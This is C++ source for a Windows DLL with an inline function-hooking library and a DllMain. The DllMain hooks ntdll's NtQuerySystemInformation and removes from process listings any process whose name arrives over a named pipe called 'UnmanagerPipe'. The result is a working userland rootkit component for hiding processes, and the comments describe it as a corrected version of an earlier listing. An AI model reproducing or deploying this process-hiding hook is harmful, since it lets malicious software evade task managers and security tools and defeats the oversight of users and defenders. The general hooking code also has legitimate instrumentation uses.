- #include "FunctionHooker.h"
- #include <Windows.h>
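namespace
{
    // Size of the scratch page that receives the copied prologue of a hooked function.
    const SIZE_T kTrampolineBytes = 1024;

    // Copies machine code from `source` into `trampoline` one byte at a time until a
    // near return has been copied: 0xC3 (`ret`) or 0xC2 (`ret imm16`) together with its
    // two immediate bytes. Returns the number of bytes copied, or 0 if no return was
    // found within `capacity` bytes.
    //
    // This is a byte scan, not a disassembler, so it is only adequate for short,
    // straight-line stubs such as ntdll's syscall thunks: 0xC2/0xC3 can also occur inside
    // another instruction's immediate, displacement or ModRM byte; code after the first
    // return (for example the target of a forward branch) is never copied; and relative
    // call/jmp targets outside the copied bytes are not relocated.
    SIZE_T CopyUntilReturn(unsigned char* trampoline, const unsigned char* source, SIZE_T capacity)
    {
        SIZE_T length = 0;
        while (length < capacity)
        {
            const unsigned char opcode = source[length];
            trampoline[length] = opcode;
            ++length;
            if (opcode == 0xC3)
            {
                return length; // ret
            }
            if (opcode == 0xC2)
            {
                // ret imm16: the 16-bit stack adjustment that follows is part of the
                // instruction (the original copied only one of its two bytes).
                if (capacity - length < 2)
                {
                    return 0;
                }
                trampoline[length] = source[length];
                trampoline[length + 1] = source[length + 1];
                return length + 2;
            }
        }
        return 0; // no return instruction within the budget
    }

    // Allocates the trampoline page read/write, copies the prologue of `source` into it,
    // then switches the page to execute/read so the process never holds a page that is
    // writable and executable at once. On success returns the page and stores the copied
    // length in *copiedLength; on failure returns NULL with nothing left allocated.
    void* BuildTrampoline(const void* source, SIZE_T* copiedLength)
    {
        void* page = VirtualAlloc(NULL, kTrampolineBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (!page)
        {
            return NULL;
        }
        RtlSecureZeroMemory(page, kTrampolineBytes);
        const SIZE_T length = CopyUntilReturn(static_cast<unsigned char*>(page),
                                              static_cast<const unsigned char*>(source),
                                              kTrampolineBytes);
        DWORD previousProtection = 0;
        if (length == 0 || !VirtualProtect(page, kTrampolineBytes, PAGE_EXECUTE_READ, &previousProtection))
        {
            VirtualFree(page, 0, MEM_RELEASE);
            return NULL;
        }
        FlushInstructionCache(GetCurrentProcess(), page, length);
        *copiedLength = length;
        return page;
    }

    // Writes `size` bytes of `patch` over `target` (WriteProcessMemory handles the page
    // protection change itself) and flushes the instruction cache. The write is not
    // atomic with respect to other threads that may be executing `target` at that
    // instant; callers must accept that race.
    bool PatchCode(void* target, const void* patch, SIZE_T size)
    {
        if (!WriteProcessMemory(GetCurrentProcess(), target, patch, size, NULL))
        {
            return false;
        }
        FlushInstructionCache(GetCurrentProcess(), target, size);
        return true;
    }

    // Stores `value` little-endian into out[0..sizeof(T)), matching x86 immediates.
    template <typename T>
    void StoreLittleEndian(char* out, T value)
    {
        for (size_t i = 0; i < sizeof(T); ++i)
        {
            out[i] = static_cast<char>((value >> (8 * i)) & 0xFF);
        }
    }
}

// Installs a 32-bit inline hook: the first 6 bytes of `hookedFunctionAddress` become
// `push imm32; ret` targeting `replacementFunctionAddress`, and a copy of the original
// prologue (up to its first `ret`) is placed in hook->OriginalFunction so the
// replacement can call through to the unpatched code. The overwritten bytes and the
// stub are kept in `hook` for UnhookFunction32.
//
// Returns 1 on success, 0 if `hook` is already in use, an argument is NULL, the target
// cannot be read, no return was found within the trampoline budget, the function is
// shorter than the 6-byte patch (the patch would spill into whatever follows it), or
// the patch could not be written. On failure `hook` stays invalid and nothing is leaked.
//
// Caveats: the prologue copy is a byte scan (see CopyUntilReturn), so this is only safe
// for short straight-line stubs, and other threads executing the target while the patch
// is written may observe a torn instruction.
int FunctionHooker::HookFunction32(void* hookedFunctionAddress, void* replacementFunctionAddress, HookStruct32* hook)
{
    if (!hook || hook->Valid || !hookedFunctionAddress || !replacementFunctionAddress)
    {
        return 0;
    }
    // Save the bytes the patch destroys; this also verifies the target is readable
    // before the raw copy below dereferences it.
    if (!ReadProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->OriginalBytes, sizeof(hook->OriginalBytes), NULL))
    {
        return 0;
    }
    SIZE_T copiedLength = 0;
    void* trampoline = BuildTrampoline(hookedFunctionAddress, &copiedLength);
    if (!trampoline)
    {
        return 0;
    }
    if (copiedLength < sizeof(hook->ReplacementBytes))
    {
        // The function ends before the patch does; writing it would clobber the next routine.
        VirtualFree(trampoline, 0, MEM_RELEASE);
        return 0;
    }

    // 68 imm32   push <replacement>
    // C3         ret   -> transfers control to the replacement without touching registers
    hook->ReplacementBytes[0] = static_cast<char>(0x68);
    StoreLittleEndian(&hook->ReplacementBytes[1],
                      static_cast<DWORD>(reinterpret_cast<ULONG_PTR>(replacementFunctionAddress)));
    hook->ReplacementBytes[5] = static_cast<char>(0xC3);

    if (!PatchCode(hookedFunctionAddress, hook->ReplacementBytes, sizeof(hook->ReplacementBytes)))
    {
        VirtualFree(trampoline, 0, MEM_RELEASE);
        return 0;
    }
    hook->OriginalFunction = trampoline;
    hook->OriginalFunctionAddress = hookedFunctionAddress;
    hook->Valid = 1;
    return 1;
}

// 64-bit counterpart of HookFunction32: the first 12 bytes of `hookedFunctionAddress`
// become `mov rax, imm64; push rax; ret`. rax is clobbered, which is acceptable at a
// function entry point under the Windows x64 ABI (rax is caller-saved). Return values,
// failure conditions and caveats are the same as for HookFunction32, with a 12-byte
// minimum function length instead of 6.
int FunctionHooker::HookFunction64(void* hookedFunctionAddress, void* replacementFunctionAddress, HookStruct64* hook)
{
    if (!hook || hook->Valid || !hookedFunctionAddress || !replacementFunctionAddress)
    {
        return 0;
    }
    if (!ReadProcessMemory(GetCurrentProcess(), hookedFunctionAddress, hook->OriginalBytes, sizeof(hook->OriginalBytes), NULL))
    {
        return 0;
    }
    SIZE_T copiedLength = 0;
    void* trampoline = BuildTrampoline(hookedFunctionAddress, &copiedLength);
    if (!trampoline)
    {
        return 0;
    }
    if (copiedLength < sizeof(hook->ReplacementBytes))
    {
        // The function ends before the patch does; writing it would clobber the next routine.
        VirtualFree(trampoline, 0, MEM_RELEASE);
        return 0;
    }

    // 48 B8 imm64   mov rax, <replacement>   (REX.W selects the 64-bit operand)
    // 50            push rax
    // C3            ret   -> transfers control to the replacement
    hook->ReplacementBytes[0] = static_cast<char>(0x48);
    hook->ReplacementBytes[1] = static_cast<char>(0xB8);
    StoreLittleEndian(&hook->ReplacementBytes[2],
                      static_cast<unsigned long long>(reinterpret_cast<ULONG_PTR>(replacementFunctionAddress)));
    hook->ReplacementBytes[10] = static_cast<char>(0x50);
    hook->ReplacementBytes[11] = static_cast<char>(0xC3);

    if (!PatchCode(hookedFunctionAddress, hook->ReplacementBytes, sizeof(hook->ReplacementBytes)))
    {
        VirtualFree(trampoline, 0, MEM_RELEASE);
        return 0;
    }
    hook->OriginalFunction = trampoline;
    hook->OriginalFunctionAddress = hookedFunctionAddress;
    hook->Valid = 1;
    return 1;
}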
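// Restores the 6 bytes HookFunction32 overwrote and releases the trampoline.
// Returns 1 when both steps succeed, 0 otherwise: if the restore fails the hook stays
// valid (the patch is still live) so the caller may retry; if only the free fails the
// hook is already marked invalid and the trampoline page leaks. Nothing here waits for
// threads that may still be executing the replacement or the trampoline.
int FunctionHooker::UnhookFunction32(HookStruct32* hook)
{
    if (!hook || !hook->Valid)
    {
        return 0;
    }
    const SIZE_T patchSize = sizeof(hook->OriginalBytes);
    if (!WriteProcessMemory(GetCurrentProcess(), hook->OriginalFunctionAddress, hook->OriginalBytes, patchSize, NULL))
    {
        return 0;
    }
    FlushInstructionCache(GetCurrentProcess(), hook->OriginalFunctionAddress, patchSize);
    hook->Valid = 0;
    if (!VirtualFree(hook->OriginalFunction, 0, MEM_RELEASE))
    {
        return 0;
    }
    hook->OriginalFunction = NULL;
    return 1;
}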
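// Restores the 12 bytes HookFunction64 overwrote and releases the trampoline.
// The original restored only 10 of the 12 patched bytes, which left `push rax; ret`
// embedded in the target function after unhooking; sizeof(OriginalBytes) keeps the
// restore in step with the patch. Return semantics match UnhookFunction32: 0 with the
// hook still valid if the restore fails, 0 with the hook invalid (and the page leaked)
// if only the free fails, 1 otherwise. Threads still inside the replacement or the
// trampoline are not waited for.
int FunctionHooker::UnhookFunction64(HookStruct64* hook)
{
    if (!hook || !hook->Valid)
    {
        return 0;
    }
    const SIZE_T patchSize = sizeof(hook->OriginalBytes);
    if (!WriteProcessMemory(GetCurrentProcess(), hook->OriginalFunctionAddress, hook->OriginalBytes, patchSize, NULL))
    {
        return 0;
    }
    FlushInstructionCache(GetCurrentProcess(), hook->OriginalFunctionAddress, patchSize);
    hook->Valid = 0;
    if (!VirtualFree(hook->OriginalFunction, 0, MEM_RELEASE))
    {
        return 0;
    }
    hook->OriginalFunction = NULL;
    return 1;
}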
- #pragma once
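// State of one 32-bit inline hook managed by FunctionHooker::HookFunction32 /
// UnhookFunction32. The pointer members are only meaningful while Valid != 0; they are
// initialised to nullptr so a fresh record never carries a stray address into
// VirtualFree or WriteProcessMemory.
struct HookStruct32
{
    char Valid = 0;                           // non-zero once the patch is installed
    char OriginalBytes[6] = {};               // bytes overwritten at the target; restored on unhook
    char ReplacementBytes[6] = {};            // `push imm32; ret` written over the target
    void* OriginalFunction = nullptr;         // executable copy of the target's prologue (trampoline)
    void* OriginalFunctionAddress = nullptr;  // the patched function
};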
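// State of one 64-bit inline hook managed by FunctionHooker::HookFunction64 /
// UnhookFunction64. Same layout as HookStruct32 with a 12-byte patch
// (`mov rax, imm64; push rax; ret`). Pointer members are nullptr until a hook is
// installed and only meaningful while Valid != 0.
struct HookStruct64
{
    char Valid = 0;                           // non-zero once the patch is installed
    char OriginalBytes[12] = {};              // bytes overwritten at the target; restored on unhook
    char ReplacementBytes[12] = {};           // `mov rax, imm64; push rax; ret` written over the target
    void* OriginalFunction = nullptr;         // executable copy of the target's prologue (trampoline)
    void* OriginalFunctionAddress = nullptr;  // the patched function
};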
- #include <Windows.h>
- #include "FunctionHooker.h"
- #include <winternl.h>
- #include "Console.h"
// Select the hook record matching the build's pointer size. _WIN32 is also defined on
// 64-bit builds, so _WIN64 must be tested first.
#if _WIN64
#define HookStruct HookStruct64
#elif _WIN32
#define HookStruct HookStruct32
#endif
#ifndef HookStruct
#error Not compiling on x86 or x64...
#endif
// Hook record for NtQuerySystemInformation; its OriginalFunction (the trampoline) is
// read by MyNtQuerySystemInformation on every call.
HookStruct hookData;
// Image name to hide, filled in DllMain from the pipe payload. RtlAnsiStringToUnicodeString
// is called with AllocateDestinationString=TRUE, so Buffer is heap memory owned by ntdll.
UNICODE_STRING hiddenName;
// Console helper declared in Console.h; not referenced by the code shown here.
Console con;
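// Pointer types for the ntdll routines resolved at runtime. NTAPI (__stdcall on x86)
// is required: without it these default to __cdecl on 32-bit builds, and calling a
// stdcall routine -- including the trampoline copy of NtQuerySystemInformation, which
// ends in `ret imm16` -- through a cdecl pointer leaves the stack unbalanced after the
// call. On x64 there is a single calling convention and NTAPI expands to nothing.
// The last parameter of RtlAnsiStringToUnicodeString is a BOOLEAN, as in winternl.h.
typedef NTSTATUS (NTAPI *_OriginalNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
typedef void (NTAPI *_RtlInitAnsiString)(PANSI_STRING, PCSZ);
typedef NTSTATUS (NTAPI *_RtlAnsiStringToUnicodeString)(PUNICODE_STRING, PCANSI_STRING, BOOLEAN);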
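// True when `name` equals the configured hiddenName, ignoring case. Both are
// UNICODE_STRINGs (Length in bytes, Buffer not guaranteed NUL-terminated), so the
// comparison passes explicit lengths instead of relying on lstrcmpiW's terminator
// scan. A NULL or empty name never matches (the first entry of the list is commonly
// reported with a NULL Buffer), and an unset hiddenName matches nothing.
static bool MatchesHiddenName(const UNICODE_STRING& name)
{
    if (name.Buffer == NULL || name.Length == 0 || hiddenName.Buffer == NULL || hiddenName.Length == 0)
    {
        return false;
    }
    const int comparison = CompareStringW(LOCALE_INVARIANT, NORM_IGNORECASE,
                                          name.Buffer, static_cast<int>(name.Length / sizeof(WCHAR)),
                                          hiddenName.Buffer, static_cast<int>(hiddenName.Length / sizeof(WCHAR)));
    return comparison == CSTR_EQUAL;
}

// Replacement for ntdll!NtQuerySystemInformation. The call is forwarded to the
// trampoline in hookData.OriginalFunction; then, for SystemProcessInformation only,
// every SYSTEM_PROCESS_INFORMATION entry whose ImageName matches hiddenName is unlinked
// by folding its NextEntryOffset into the previous visible entry's. Every other
// information class is returned untouched, so process lists obtained through other
// classes are not filtered.
//
// Fixes relative to the original: the list is walked only when the call succeeded (a
// size probe returns STATUS_INFO_LENGTH_MISMATCH and leaves the buffer unfilled);
// every entry and link is bounds-checked against SystemInformationLength; the
// "previous" pointer advances only past entries that stay visible, so adjacent matches
// are all removed; and a match at the head of the list no longer dereferences an
// uninitialised pointer. The head entry itself cannot be unlinked this way and is
// left in place.
NTSTATUS __stdcall MyNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
{
    _OriginalNtQuerySystemInformation original = (_OriginalNtQuerySystemInformation) hookData.OriginalFunction;
    const NTSTATUS result = original(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

    if (!NT_SUCCESS(result) || SystemInformation == NULL || SystemInformationLength == 0
        || SystemInformationClass != SystemProcessInformation)
    {
        return result;
    }

    unsigned char* const base = static_cast<unsigned char*>(SystemInformation);
    const ULONG limit = SystemInformationLength;
    SYSTEM_PROCESS_INFORMATION* previousVisible = NULL;
    ULONG offset = 0;

    for (;;)
    {
        // The fixed part of the entry must lie entirely inside the caller's buffer.
        if (offset > limit || limit - offset < sizeof(SYSTEM_PROCESS_INFORMATION))
        {
            break;
        }
        SYSTEM_PROCESS_INFORMATION* entry = reinterpret_cast<SYSTEM_PROCESS_INFORMATION*>(base + offset);
        const ULONG next = entry->NextEntryOffset;

        if (MatchesHiddenName(entry->ImageName))
        {
            if (previousVisible != NULL)
            {
                // Skip this entry: the predecessor now links to whatever follows it, or
                // terminates the list if this was the last entry.
                previousVisible->NextEntryOffset = (next == 0) ? 0 : previousVisible->NextEntryOffset + next;
            }
        }
        else
        {
            previousVisible = entry;
        }

        if (next == 0 || next > limit - offset)
        {
            break; // end of list, or a link that would leave the buffer
        }
        offset += next;
    }
    return result;
}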
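// Reads the image name to hide from the controller's named pipe into `out` (capacity
// bytes). Returns true when at least one byte arrived; `out` is then NUL-terminated,
// which the original did not guarantee before handing the buffer to RtlInitAnsiString.
// Any I/O failure is final: a synchronous ReadFile on this pipe blocks until data is
// available and fails once the pipe is broken, so the original's retry-forever loop
// could spin indefinitely inside DllMain.
static bool ReadHiddenNameFromPipe(char* out, DWORD capacity)
{
    if (out == NULL || capacity < 2)
    {
        return false;
    }
    // Path \\.\pipe\UnmanagerPipe; each backslash must be escaped in the literal (the
    // pasted listing had the escapes collapsed, which does not compile as written).
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\UnmanagerPipe", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe == INVALID_HANDLE_VALUE)
    {
        return false;
    }
    DWORD bytesRead = 0;
    const BOOL ok = ReadFile(pipe, out, capacity - 1, &bytesRead, NULL);
    CloseHandle(pipe);
    if (!ok || bytesRead == 0)
    {
        return false;
    }
    out[bytesRead] = '\0';
    return true;
}

// Installs the NtQuerySystemInformation hook on process attach and removes it on an
// explicit unload. Everything in DLL_PROCESS_ATTACH runs under the loader lock: ntdll
// is resolved with GetModuleHandleW (it is always mapped, and LoadLibrary inside
// DllMain is documented as unsafe), but the pipe read is still blocking I/O inside
// DllMain; a worker thread would be the safer home for it if it is acceptable for the
// hook to become active slightly later.
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
        if (ntdll == NULL)
        {
            break;
        }
        void* ntQueryAddr = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtQuerySystemInformation"));
        _RtlInitAnsiString initAnsiString =
            reinterpret_cast<_RtlInitAnsiString>(GetProcAddress(ntdll, "RtlInitAnsiString"));
        _RtlAnsiStringToUnicodeString ansiToUnicode =
            reinterpret_cast<_RtlAnsiStringToUnicodeString>(GetProcAddress(ntdll, "RtlAnsiStringToUnicodeString"));
        if (ntQueryAddr == NULL || initAnsiString == NULL || ansiToUnicode == NULL)
        {
            break;
        }

        char nameBuffer[MAX_PATH];
        if (!ReadHiddenNameFromPipe(nameBuffer, sizeof(nameBuffer)))
        {
            break; // no name to hide: leave the process unhooked
        }

        ANSI_STRING ansiName;
        initAnsiString(&ansiName, nameBuffer);
        // AllocateDestinationString=TRUE: hiddenName.Buffer is allocated by ntdll and
        // intentionally kept for the lifetime of the process.
        if (!NT_SUCCESS(ansiToUnicode(&hiddenName, &ansiName, TRUE)))
        {
            break;
        }

        FunctionHooker hooker;
#if _WIN64
        hooker.HookFunction64(ntQueryAddr, reinterpret_cast<void*>(&MyNtQuerySystemInformation), &hookData);
#elif _WIN32
        hooker.HookFunction32(ntQueryAddr, reinterpret_cast<void*>(&MyNtQuerySystemInformation), &hookData);
#endif
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        // lpReserved == NULL means FreeLibrary rather than process exit: this DLL is about
        // to be unmapped, so the patch in ntdll must be removed first or the next
        // NtQuerySystemInformation call lands in unmapped memory. At process exit the
        // patch dies with the process. Threads currently inside the replacement or the
        // trampoline are not waited for.
        if (lpReserved == NULL && hookData.Valid)
        {
            FunctionHooker hooker;
#if _WIN64
            hooker.UnhookFunction64(&hookData);
#elif _WIN32
            hooker.UnhookFunction32(&hookData);
#endif
        }
        break;
    }
    return TRUE;
}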